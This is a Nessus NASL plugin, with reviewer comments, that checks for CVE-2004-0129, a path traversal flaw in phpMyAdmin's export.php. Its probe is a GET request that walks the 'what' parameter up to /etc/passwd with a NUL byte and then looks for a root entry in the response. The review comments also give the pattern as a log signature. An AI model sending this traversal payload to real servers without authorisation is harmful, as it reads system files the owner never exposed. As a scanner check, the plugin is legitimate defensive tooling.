CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
Percentile
86.4%
There is a bug in the remote version of phpMyAdmin that may allow an attacker to read arbitrary files on the remote web server with the privileges of the web user or even execute arbitrary PHP code. Successful exploitation of this issue requires that PHP’s ‘magic_quotes_gpc’ setting be disabled.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Plugin registration: when the script is run with 'description' set, it only
# declares its metadata (IDs, references, scoring, scheduling constraints) and
# exits before any request is sent to the target.
if (description)
{
script_id(12041);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
# Identifiers for cross-referencing the finding with advisories and ticketing.
script_cve_id("CVE-2004-0129");
script_bugtraq_id(9564);
script_name(english:"phpMyAdmin export.php what Parameter Traversal Arbitrary File Access");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
local file inclusion flaw.");
script_set_attribute(attribute:"description", value:
"There is a bug in the remote version of phpMyAdmin that may allow an
attacker to read arbitrary files on the remote web server with the
privileges of the web user or even execute arbitrary PHP code.
Successful exploitation of this issue requires that PHP's
'magic_quotes_gpc' setting be disabled.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Feb/55");
script_set_attribute(attribute:"see_also", value:"http://sourceforge.net/forum/forum.php?forum_id=350228");
script_set_attribute(attribute:"solution", value:
"Upgrade to phpMyAdmin version 2.4.6-rc1 or later.");
# NOTE(review): this base vector rates confidentiality, integrity and
# availability as partial at high complexity, which matches the "or even
# execute arbitrary PHP code" wording above. The CVSS2 vector shown in the
# page header (AV:N/AC:L/Au:N/C:P/I:N/A:N) rates confidentiality only, at low
# complexity. Decide which source is authoritative before using the score for
# prioritisation.
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
# NOTE(review): "No exploit is required" fits the single crafted GET used by
# the check below, but exploit_available is "false" while the temporal vector
# says E:POC; treat these fields as advisory rather than consistent.
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2004/02/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2004/02/03");
script_set_attribute(attribute:"plugin_type", value:"remote");
# The CPE names the product only, with no version component.
script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
# Registered as an information-gathering check; the check itself is one GET.
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2004-2022 Tenable Network Security, Inc.");
# Scheduling constraints: phpMyAdmin_detect.nasl runs first (presumably it
# writes the per-port "www/<port>/phpMyAdmin" KB entry read by the check --
# confirm in that plugin), both KB keys below must be present, and the plugin
# is skipped when CGI scanning is disabled in the scan settings.
script_dependencies("phpMyAdmin_detect.nasl");
script_require_keys("www/phpMyAdmin", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Select the HTTP port under test (default 80). php:TRUE presumably limits
# the check to servers where PHP support was detected -- confirm in http.inc.
port = get_http_port(default:80, php:TRUE);

# Look up the phpMyAdmin install recorded for this port in the knowledge base;
# without one there is nothing to test.
install = get_kb_item(string("www/", port, "/phpMyAdmin"));
if (isnull(install)) exit(0);

# The KB value is expected to look like "<something> under <path>"; only the
# path (second capture group) is used. A value in any other form ends the
# check silently.
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (isnull(matches)) exit(0);

dir = matches[2];

# Detection probe: a single GET to export.php whose 'what' parameter walks up
# the directory tree to /etc/passwd and ends in an encoded NUL byte.
#
# Caveats for whoever triages the result:
#  - The evidence is a Unix passwd line, so installs hosted on other
#    platforms never produce a finding from this check.
#  - Per the plugin description, exploitation needs magic_quotes_gpc to be
#    disabled. A clean result on a host where it is enabled does not show the
#    install is fixed; compare the installed version with the fixed release
#    named in the solution (2.4.6-rc1 or later).
#  - In web server access logs the same pattern (export.php with a 'what'
#    value containing "../" sequences and "%00") is a usable detection
#    signature for real exploitation attempts.
url = string(dir, "/export.php?what=../../../../../../../../../../etc/passwd%00");
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

# res[2] is searched for a root entry with UID 0 and GID 0 or 1; a hit means
# the file contents were returned in the response.
if (egrep(pattern:".*root:.*:0:[01]:.*", string:res[2]))
{
  # Only the port is reported: the finding carries neither the request nor
  # the matched line, so analysts have to reproduce the evidence themselves.
  security_warning(port);
  exit(0);
}